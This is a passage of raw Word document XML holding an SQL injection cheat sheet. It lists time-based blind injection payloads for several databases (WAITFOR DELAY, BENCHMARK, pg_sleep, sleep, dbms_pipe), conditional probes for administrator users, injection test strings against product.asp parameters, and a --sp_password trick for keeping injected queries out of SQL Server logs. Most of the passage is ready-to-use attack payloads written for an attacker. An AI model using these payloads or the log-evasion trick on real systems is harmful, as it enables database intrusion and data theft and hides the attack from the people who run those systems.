          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>list of possible characters. If your only indication of success are differing response times or if the application is slow, you can use an algorithm like the one above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331F7E16"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Ways of making databases wait or sleep for blind SQL injection attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A34D6B3"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You should only use time-based payloads for totally blind injections. For normal blind injections, it’s better to just use boolean-based methods (like error-based true/false tests) to identify the difference in responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381D8085"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Be careful if using times longer than 20–30 seconds because the database API connection or script can time out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED852F2" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WAITFOR DELAY (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF2E595"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This is just like a sleep command—a CPU-safe way to make the database wait for a specified time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205E4C8A"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WAITFOR DELAY '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAB0194"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You can also use fractional time values, though in general, longer waiting times are less sensitive to variations in server load or available bandwidth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2768747E"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WAITFOR DELAY '0:0:0.51'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D49C490" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sample payloads with WAITFOR DELAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4206AA65" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Checking if we’re the system administrator: </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if (select user) = 'sa' waitfor delay '0:0:10'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C3B5B1" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Different ways of injecting a delay into something like </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE ProductID = '1'</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Instead of just the expected integer, we can try injecting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331E0857" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>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1;waitfor delay '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2232BE8F" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>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1);waitfor delay '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC53C55" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>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1';waitfor delay '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA84E31" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>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1');waitfor delay '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCC61F3" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>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1));waitfor delay '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED6914D" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>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1'));waitfor delay '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689111B5" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BENCHMARK() (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20614BAF"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 xml:space="preserve">The BENCHMARK() function is intended for timing performance when executing some expression a specified number of times. We can abuse it for time-based attacks to make MySQL wait a bit. Because this function consumes CPU cycles, be </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>careful you don’t use up the entire web server resource limit. It's best to start with lower values and increase them gradually just until you get stable results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA146E0"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BENCHMARK(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>how-many-repeats</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>expression-to-execute</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7928D218" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sample payloads with BENCHMARK()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E10D0F1" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Are we root? Woot! Let’s celebrate with a billion hashes:</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IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562C6885" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Checking if a table exists: </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IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B28E49" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pg_sleep() (P)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D09436F"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Sleep for the specified time in seconds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476CED04" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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pg_sleep(10); </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Sleep for 10 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CD82C7" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sleep() (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1EDB58"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Sleep for the specified time in seconds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD18AA6" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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sleep(10); </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Sleep 10 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC0C751" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dbms_pipe.receive_message() (O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AB2D11"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Sleep for the specified time in seconds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ECB952" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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CASE WHEN (NVL(ASCII(SUBSTR((</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>your-injected-query-here</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>),1,1)),0) = 100) THEN dbms_pipe.receive_message(('xyz'),10) ELSE dbms_pipe.receive_message(('xyz'),1) END FROM dual)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>If the condition is true, the response will arrive after 10 seconds. If it is false, the delay will be only one second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518E57F4"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>How SQL injection attacks can be hidden from logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD10B53"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SQL Server log bypass using sp_password (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAC4744"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lastRenderedPageBreak/>
        <w:t>For security reasons, SQL Server doesn’t log queries that include the function </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sp_password</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (used for changing passwords). This can be abused to prevent certain queries from being logged by the database server—simply appending </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--sp_password</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> to an SQL query is enough to bypass logging. Note that the request will still appear in web server logs if injecting into a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> parameter (but not </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E36ECEC"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tests to check if SQL injection is possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2BDED2"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Here are some quick checks to determine if blind SQL injections are possible:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0FE3E5" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Trying to inject into </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>product.asp?id=4</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (SMO):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA6BE94" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>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product.asp?id=5-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (returns the result for </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id=4</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEA0D4D" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>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product.asp?id=4 OR 1=1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470D457F" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Trying to inject into </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>product.asp?name=Book</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63300329" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>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product.asp?name=Bo'%2b'ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F6168F" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>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product.asp?name=Bo' || 'ok</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (only MO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CC3D8C" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>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product.asp?name=Book' OR 'x'='x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0061F649"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tips and tricks for working with MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4931FA81" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Working with users:</w:t>
      </w:r>
    </w:p>
